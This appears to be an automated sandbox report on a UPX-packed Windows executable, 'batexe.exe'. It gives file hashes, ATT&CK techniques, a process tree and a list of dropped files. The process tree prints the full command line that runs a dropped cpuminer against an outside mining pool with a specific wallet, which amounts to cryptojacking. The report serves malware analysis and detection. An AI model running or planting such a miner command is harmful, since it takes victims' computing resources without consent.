73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
286s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13-02-2024 23:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
692	b2e.exe
3392	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3392	cpuminer-sse2.exe
3392	cpuminer-sse2.exe
3392	cpuminer-sse2.exe
3392	cpuminer-sse2.exe
3392	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4024-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4024 wrote to memory of 692	4024	batexe.exe	85
PID 4024 wrote to memory of 692	4024	batexe.exe	85
PID 4024 wrote to memory of 692	4024	batexe.exe	85
PID 692 wrote to memory of 3808	692	b2e.exe	88
PID 692 wrote to memory of 3808	692	b2e.exe	88
PID 692 wrote to memory of 3808	692	b2e.exe	88
PID 3808 wrote to memory of 3392	3808	cmd.exe	89
PID 3808 wrote to memory of 3392	3808	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4024
- C:\Users\Admin\AppData\Local\Temp\B69E.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\B69E.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B69E.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B94D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3808
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B69E.tmp\b2e.exe

Filesize
4.7MB

MD5
039ac260ebaf0defce3b180549aa9eaf

SHA1
98027910b2602d48ba0b15b11808fc0d2d773bb0

SHA256
bdf80190f9467038253d8d96552752abb40bec4d3107b9f7e3aae807a98fc658

SHA512
17b99abeb11384eb97f58bf9c180e138132b61b19cd187d3feff3b7778b3102c9d6e0724ae1b23a8420e722f419b36ecfe21b91a9d779b6ea69957b8d2ae9647

Download Submit
C:\Users\Admin\AppData\Local\Temp\B69E.tmp\b2e.exe

Filesize
2.0MB

MD5
e5cccc90d9a2d18f59cd7b8e213dd670

SHA1
0b28637b882e195f08633e221cb06a0051431daf

SHA256
af957b630f0dfe00fccf26174dc820828e0d351c80bf53357ea97250096e4315

SHA512
8047489287b643822451502dc92a2365ad0467ff0d0d89d81966d7a7abe01f25120a77ac85567f977852da318ff326243bbc8dde3df0f1784f2fce25a083886b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B69E.tmp\b2e.exe

Filesize
1.7MB

MD5
7054da142b91f3a62d7c46b41c675ef2

SHA1
7a5473ad7cd0e382559247437c26445849c8cfbd

SHA256
3a526e6944ee45ed7e06fb40b06af747e2c0237ce7c3413a026dbdc0f87d939f

SHA512
1bc738df31d9207951124216fb4a8aec103b932fcba78272e4fd7b0bc683972d7824c3e8504bdc6a4cb6ee6a620c10a5c03c3faf694a1a83178fa2faa3655633

Download Submit
C:\Users\Admin\AppData\Local\Temp\B94D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
586KB

MD5
4ff4e2484acf369f09e5de327449c013

SHA1
03872700720f636a08472a4c72ad962538743daa

SHA256
6245d52e71961d5825229403d3ff36ce5d9396425f90463546d83a83a5eace5e

SHA512
13a6a738ce2734e72dc93fd40d495581ae34cab18bf381eef414ad9b8c6a43b1a43eae1f8082fc4957ea78ae7814be88e0574b7998ecb4ac77becad81f8ae5b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
287KB

MD5
ab05117f1f68eb5a834fae116834ddb0

SHA1
b02c9ad3f597e241668c2ce381fc158988927289

SHA256
e530cf9c2568462ac997f61b4838335c57b725b3a304fb0c732614cbd2bf0825

SHA512
706b09245534b01791f913cdbb5efe0ee9f55331c7cad7b68ae93a5dfaaa06006540bde60e912372d3a3f27de2cce80af0b776b33b357caca863b1342157ebd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
285KB

MD5
5861ae7da3a9ed50d1a34cb66c91bb89

SHA1
e056b96b0634562dca712b0f09138b57f8aa056e

SHA256
c98db95053470db12077ea2501b17c6a349d4c679ec899be67b53bfd41a9888e

SHA512
a80ec0342c313c89c798a8a0da1966da1c70f581c6f72828c7c503ce03e181c18c8f510c228d8406b6d461a38f5554c9ece71eceb701d7640a7a1887825df984

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
391KB

MD5
a78d90e9e9d1fe2f014eab311d9eec60

SHA1
ec86d433955cb80f630d3d1efb31f5ab15597e06

SHA256
3993af6efbb8c7f49f9a11f107be90330fb35ad85f42dec3634ad7f4cb8d1c6c

SHA512
8719bb1e087c4b802049865740fc757b90520a5f21c49ae299be392867518d9ecd12a66bd792da8c22b4f5c10cbe5827b60480d54e1a8ea45e6b944ccdcaa7d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
385KB

MD5
e54b32a27465c8199cdc515f27980d62

SHA1
9274f23cbb1b5c773f938765614340e8069964dc

SHA256
42ae7814cce864b06691b30a4633901b9d5b6104be2f95101739381dfe28313c

SHA512
219b4d43ad89804d9eb2ae3e35954d7e5b41488d2f3f4924ceb7c0db24b3e2bd5ce76e6f7bc4e135b45616890825666c3c43ef1d10bf3b2064d32b5bff877ad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
323KB

MD5
a94cf31c34f24a0fe6721a97bdb7cfaf

SHA1
735dbeef87ac2ae8dbd4660f6f43c4cd0119450b

SHA256
3a4ef32b575e0c3c3f79ee4d3c7a625a92ee968e22d3e1e6f881dfc62df14e6c

SHA512
4a3f640cc6972f161a091f2d44cb55e38071de1bc2f7b248a507f0cd3963583f4f26edc1635cb82d11ff41055985b08bb66110137bf2d83e57c9ffef99e55c8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
437KB

MD5
aebff16fabeae602a81fa8f24d6845a9

SHA1
335701724291f2df2aa6373c0b796f02ec31c133

SHA256
0e523e0e1b7e0ff29c4ecc5cd0f5d489b431d0d67201bee0c7341114d08928b4

SHA512
8a2bc4e8bd3711b3fb5dbc7fa0a5c4ca028c6d181c5cbf81f2636ec5cef3484dc923973f9fc1340bc470a58da9dfc62e17fa4752272e452d4a3bcaddd651b112

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
192KB

MD5
25f8e8a980a2ceb66057e8bfe00e8302

SHA1
c2334b7d8abc272a1ffd91c79c6516fe5e2dda97

SHA256
f34c8e452d78a65c5a398031895625712ef132f9d191cef6bab9462a713fd626

SHA512
15f1dfe071b15dd4e49d84f9615c5e67bd4be39bb93508cc46f31e809212ea00c5a4dde7ca3a5a7531952c052bece1a60099c0914a5ed5c7cdee950ef7f47344

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
374KB

MD5
621bbd4a5813d8f1e7087f2631309d2b

SHA1
4796266906297dc4da80acc27406cf8ad3e02d3a

SHA256
5f1a8250a2bf358ddda0fb82edd05d44c6a2bb683dbfbd19d4fed35bf1d2ad60

SHA512
9f42d7e0fd76b6d34512b16883d29b9652c4391d01ea5b65034626fa83a420a3d5fed927b61ae878cee74dd6e535126bd7ef36705184f62d36054782da2cf3d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
342KB

MD5
d763f49d0b55d3bc0bf684eb1d29a296

SHA1
ed17cd80119ddccce20d0bdf6b44e9922f168f6e

SHA256
b32f69cbd60340a5a02457722c1a7217b828ecfb9873413671ed0f694ac57666

SHA512
f045b09dfe36ace012382d6716771f4ecc78cf976839870c753b63927dd474cdbe44237b70a2b2c27b7ee7e3b96b8cd193cb5b1897f3030ddf7097b2458bb333

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
393KB

MD5
4772159525f8bd38a85847d6e04cee45

SHA1
9f0d27775a79e79251403993ee3fd89520885d43

SHA256
c238bb909080e908ccfadd8e0df4b71d72b223729affe00c39078a5a6b457325

SHA512
98e6511b50cbb9e97738f99e0593345446eb80300dadb85a33deb8adb63b6343584158f88208720ee779207a9e1f4f13ac27596ca4a7fd2ead6db5d6b922daef

Download Submit
memory/692-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/692-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3392-46-0x0000000073A60000-0x0000000073AF8000-memory.dmp

Filesize
608KB

Download
memory/3392-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3392-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3392-47-0x0000000001040000-0x00000000028F5000-memory.dmp

Filesize
24.7MB

Download
memory/3392-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-55-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3392-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3392-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4024-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download